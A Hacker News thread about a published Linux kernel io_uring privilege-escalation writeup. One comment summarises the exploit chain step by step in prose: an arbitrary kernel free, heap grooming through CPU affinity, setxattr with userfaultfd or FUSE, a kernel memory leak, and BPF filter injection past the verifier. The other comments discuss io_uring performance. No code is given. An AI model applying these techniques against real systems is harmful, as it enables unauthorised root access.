[HN Gopher] Put an io_uring on it: Exploiting the Linux kernel
       ___________________________________________________________________
        
       Put an io_uring on it: Exploiting the Linux kernel
        
       Author : blopeur
       Score  : 80 points
       Date   : 2022-03-08 19:35 UTC (3 hours ago)
        
 (HTM) web link (www.graplsecurity.com)
 (TXT) w3m dump (www.graplsecurity.com)
        
       | BigComrade wrote:
        
       | tptacek wrote:
       | This is one of the all-time great LPE writeups.
       | 
       | A summary:
       | 
       | 1. io_uring includes a feature that asks the kernel to manage
       | groups of buffers for SQEs (the objects userland submits to tell
       | uring what to do). If you enable this feature, the kernel
       | overloads a field normally used to track a userland pointer with
       | a kernel pointer.
       | 
       | 2. The special-case code that handles I/O operations for files-
       | that-are-not-files, like in procfs, missed the check for this
       | "overloaded pointer" hack, and so can be tricked into advancing a
       | kernel pointer arbitrarily, because it thinks it's working with a
       | userland pointer.
       | 
       | 3. The pointer you manipulate thusly is eventually freed, which
       | lets you free kernel objects within a range of possible pointers.
       | 
       | 4. io_uring allows you to control the CPU affinity of the kernel
       | threads it generates on your behalf, because of course it does,
       | so you can get your userland process and all your related
       | io_uring kthreads onto the same CPU, and thus into the same SLUB
       | cache area, which gives you enough control to target specific
       | kernel objects (of a size bounded I think by the SQE?) reliably.
       | 
       | 5. There's a well-known LPE trick for exploiting UAFs: the
       | setxattr(2) syscall copies arbitrary extended attributes for
       | files from userland to kernel buffers (that's its job), and the
       | userfaultfd(2) syscall lets you defer page faults to userland;
       | you can chain setxattr and userfaultfd to allocate and populate a
       | kernel buffer of arbitrary size and contents and then block,
       | keeping the object in memory.
       | 
       | 6. Since that's a popular exploit technique, there's a default-
       | yes setting in most distros to require root to use userfaultfd(2)
       | --- but you can do the same thing with FUSE, where deferring I/O
       | operations to userland is kind of the whole premise of the
       | interface.
       | 
       | 7. setxattr/userfaultfd can be transformed from a UAF primitive
       | to an arbitrary kernel leak: if you have an arbitrary-free
       | vulnerability (see step 3), you can do the setxattr-then-block
       | thing, then trigger the free from another thread and target the
       | xattr buffer, so setxattr's buffer is reclaimed out from under
       | it, then trigger the allocation of a kernel structure you want to
       | leak that is of the same size, which setxattr will copy into
       | (another UAF); now you have a kernel structure that the kernel is
       | treating like a file's extended attributes, which you can read
       | back with getxattr. Neat!
       | 
       | 8. At this point you can go hunting for kernel structures to
       | whack, because you can use the arbitrary leak primitive to leak
       | structs that in turn embed the (secret) addresses of other kernel
       | structures.
       | 
       | 9. Find a pointer to a socket's BPF filter and use the UAF to
       | inject a BPF filter directly, bypassing the verifier, then
       | trigger the BPF filter and do whatever you want, I guess.
       | 
       | I'm sure I got a bunch of this wrong; corrections welcome. Again:
       | really spectacular writeup: a good bug, some neat tricks, and a
       | decent survey of Linux kernel LPE techniques.
        
       | junon wrote:
       | Yes, unfortunately I figured this might happen. People have been
       | warning of some major issues with its design for a while now wrt
       | security. Paired with the fact it's not much faster in practice
       | than epoll in a large majority of usecases, I really worry it's
       | going to footgun some people.
        
         | FridgeSeal wrote:
         | I'm confused by this, isn't one of the mains points of uring is
         | that it's faster?
        
         | frevib wrote:
         | For disk IO it's faster, there are many benchmarks on the
         | internet.
         | 
         | For network IO, it depends. Only two things make it
         | theoretically faster than epoll; io_uring supports batching of
         | requests, and you can save one sys call compared to epoll in an
         | event loop. There some other things that could make it faster
         | like SQPOLL, but this could also hurt performance.
         | 
         | Network IO discussion:
         | https://github.com/axboe/liburing/issues/536
        
         | dralley wrote:
         | > Paired with the fact it's not much faster in practice than
         | epoll in a large majority of usecases, I really worry it's
         | going to footgun some people.
         | 
         | "it's not faster than epoll" is somewhat dependent on your
         | hardware and kernel. For one thing, Jens Axobe has been working
         | on a lot of io-uring optimizations lately, but you probably
         | won't see them unless you're using a kernel from the last few
         | months. And by "a lot" I really mean 3x to 4x faster in the
         | last year on the benchmarks he has been using.
         | 
         | So if all your comparisons are on an enterprisey linux distro,
         | you probably aren't getting a complete picture of epoll vs io-
         | uring performance. epoll has been around a while, it's had more
         | hours poured into optimization and probably regresses less
         | frequently.
        
       | egberts1 wrote:
       | Whoa!
       | 
       | One frickin' GIANT driver coherency setting, I/O Ring, that is.
        
       ___________________________________________________________________
       (page generated 2022-03-08 23:00 UTC)